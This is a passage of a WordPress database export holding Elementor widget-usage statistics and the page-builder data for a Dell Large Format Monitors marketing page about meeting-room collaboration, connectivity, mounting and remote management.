trol_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:12;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:12;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:12;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:12;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:7;}}}}}'),(8583,1481,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:12;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:5;}}}}}'),(8584,1480,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:18;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:18;s:11:\"header_size\";i:17;s:5:\"align\";i:13;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:18;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:9;s:8:\"_padding\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:18;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:14;s:21:\"space_between_widgets\";i:7;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:14;s:10:\"image_size\";i:6;s:22:\"image_custom_dimension\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:27;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:27;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:13;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:3;}}}}}'),(8585,1449,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:19;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:19;s:11:\"header_size\";i:16;s:5:\"align\";i:16;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:19;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:28;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:25;s:5:\"align\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:7;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:16;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:42;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:42;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:17;s:8:\"_padding\";i:5;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"column_gap\";i:1;}}}}}'),(8586,1451,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8587,1448,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:6;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}}}}}'),(8588,1447,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:5;s:11:\"header_size\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:5;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:35;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:28;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:21;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:14;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:17;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:17;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:16;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:14;}}}}}'),(8589,1446,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8590,1445,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:17;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:17;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:11;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:20;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:13;s:16:\"content_position\";i:1;s:21:\"space_between_widgets\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:5:\"align\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:3;}}}}}'),(8591,16,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:37;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:32;s:16:\"content_position\";i:1;s:21:\"space_between_widgets\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:21;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:21;s:10:\"image_size\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:11;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:1:{s:21:\"background_background\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:24;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:24;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:4;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:27;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:4:{s:4:\"text\";i:27;s:4:\"link\";i:27;s:5:\"align\";i:27;s:4:\"size\";i:27;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:16:\"background_color\";i:27;}}}}}'),(8705,3672,'_elementor_edit_mode','builder'),(8706,3672,'_elementor_template_type','wp-page'),(8707,3672,'_elementor_version','2.7.4'),(8708,3672,'_wp_page_template','template-fullwidth.php'),(8709,3672,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01f3af0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f845c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6933422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Captivate your audience<\\/h2><\\/div><div><ul><li><strong>Make the most of your meeting:<\\/strong>\\u00a0With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.<\\/li><\\/ul><ul><li><strong>Present crisply and clearly:<\\/strong>\\u00a0Monitor scaling technology allows you to capture your audience\\u2019s attention with exceptionally clear text and vivid visuals.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a70680\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"670e9e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_05.jpg\\\" alt=\\\"Captivate your audience\\\" width=\\\"360\\\" height=\\\"267\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4b5b73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0df3684\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb72a42\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67af6a3\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"1823f82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2c8aa0a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dell Large Format Monitors\",\"align\":\"center\",\"title_color\":\"#353535\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73d6a89\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4bd9f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2816dd3\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=Z98yJnbXWq8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"autoplay\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"746f096\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0102d24\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"249ca4a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d291a0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"6228508\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7c029ba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Flexible IT solutions<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fca6377\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"32f148a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_06.jpg\\\" alt=\\\"Flexible IT solutions\\\" width=\\\"445\\\" height=\\\"351\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0d8bc3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"be5af88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"28958ec\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b7a77eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5bc9eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e074cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_07.jpg\\\" alt=\\\"Adapts to business needs. Present and future.\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b39d618\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4f1e8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Adapts to business needs. Present and future.<\\/h2><\\/div><div><ul><li><strong>Solutions that work with you:<\\/strong>\\u00a0Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology you\\u2019re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can also\\u00a0be loaded with your preferred corporate image, so that it adheres to your security and service standards.<\\/li><\\/ul><ul><li><strong>Customized to your needs:<\\/strong>\\u00a0Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7383992\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4264633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"494b60f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9282776\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"91efb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"758e0fa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Easy to deploy. Simple to manage.<\\/h2><\\/div><div><ul><li><strong>A smooth deployment:<\\/strong>\\u00a0With a few painless steps, and a couple of extra hands, it\\u2019s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether that\\u2019s a mobile cart, stand or wall mount.<\\/li><li><strong>Manage your meeting spaces:<\\/strong>\\u00a0With RS232 and RJ45<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7ed52d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"35ef182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_08.jpg\\\" alt=\\\"Easy to deploy. Simple to manage.\\\" width=\\\"355\\\" height=\\\"263\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3643da4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"eba13d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"99eb408\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_09.jpg\\\" alt=\\\"Ultimate management\\\" width=\\\"337\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84d2d5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"857f2f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Ultimate management<\\/h2><\\/div><div><ul><li><strong>Seamless integration for easy access:<\\/strong>\\u00a0Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0without the need for a separate power cord, simplifying access to WiFi, annotation\\u00a0and\\u00a0meeting room management applications.<\\/li><li><strong>Easy to upgrade:<\\/strong>\\u00a0Thanks to\\u00a0it\'s\\u00a0modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0986c04\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea07f49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8d2e27\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"651dcf7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"e0e5fdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"e3c5aec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Solutions you can count on<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Our low maintenance monitors and reliable service solutions are here to support you through every 